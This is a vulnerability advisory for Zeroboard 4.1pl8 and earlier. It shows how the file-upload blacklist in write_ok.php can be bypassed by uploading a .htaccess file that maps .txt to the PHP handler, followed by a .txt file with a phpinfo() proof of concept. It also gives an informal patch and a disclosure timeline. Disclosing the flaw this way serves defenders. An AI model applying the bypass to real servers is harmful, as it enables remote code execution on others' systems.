Zeroboard File Upload & extension bypass Vulnerability
Author : Choi Min-sung (mins __at__ wins21.com) Product : Zeroboard http://www.nzeo.com Verndor-Patches : Unpatched Impact : remote code execution Summary ======= Basically, the PHP, HTML, and CGI files are prohibited to upload in Zeroboard. But uploading of the other files which can modify the configuration of Apache such as .htaccess is not considered as a serious issue. Therefore, an unknown attacker can execute any malicious codes on the system and acquire system control also. Affected Products ================= * The FileType in the .htaccess can be modified by configuring the Override FileInfo or OverrideAll in the httpd.conf of Apache. * Zeroboeard4.1pl8 or earlier Details ======= Zeroboard basically prohibits uploading execution scripts such as php, html, cgi, and asp. write_ok.php ------------ // Upload prohibited if($file1_size>0) { $s_file_name1=$file1_name; if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1) ||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi ("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1) ||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); : But the above codes cannot block the upload of files such as .htaccess and etc. The Process of an Actual Attack =============================== - Attack Scenario 1. A malicious user uploads a following '.htaccess' file. .htaccess --------- AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt 2. A malicious user uploads a following .txt file. test.txt -------- <? phpinfo(); ?> 3. The PHP script is executed, because the .txt file is modified to execute the PHP script. $ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt Solution ======== Below is an informal patch that I made. Vendor Proceed -> Unpatched write_ok.php.patch ------------------ --- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 +++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 @@ -208,7 +208,7 @@ // Upload prohibited if($file1_size>0) { $s_file_name1=$file1_name; - if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1) ||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1) ||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); + if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi ("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi ("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); //Check extension if($setup[pds_ext1]) { Timeline ======== 01/09/2005 Initial vendor notification. I made Temporary Patch. 02/09/2005 Vendor confirms vulnerability. 15/03/2006 Released Patch 4.1pl8 (NOT PATCHED THIS VULNERABILITY) 12/06/2006 Vulnerability reported to KISA (Korea Infomation Security Agency) KRCert 12/06/2006 Final Vendor Contact. 12/06/2006 Secunia notified of this vulnerability. 16/06/2006 Public disclosure. Credits ======= Discovered by Choi Min-sung, WINSTechnet CERT Reference Site ============== http://securecast.wins21.com/zerovul.html http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391
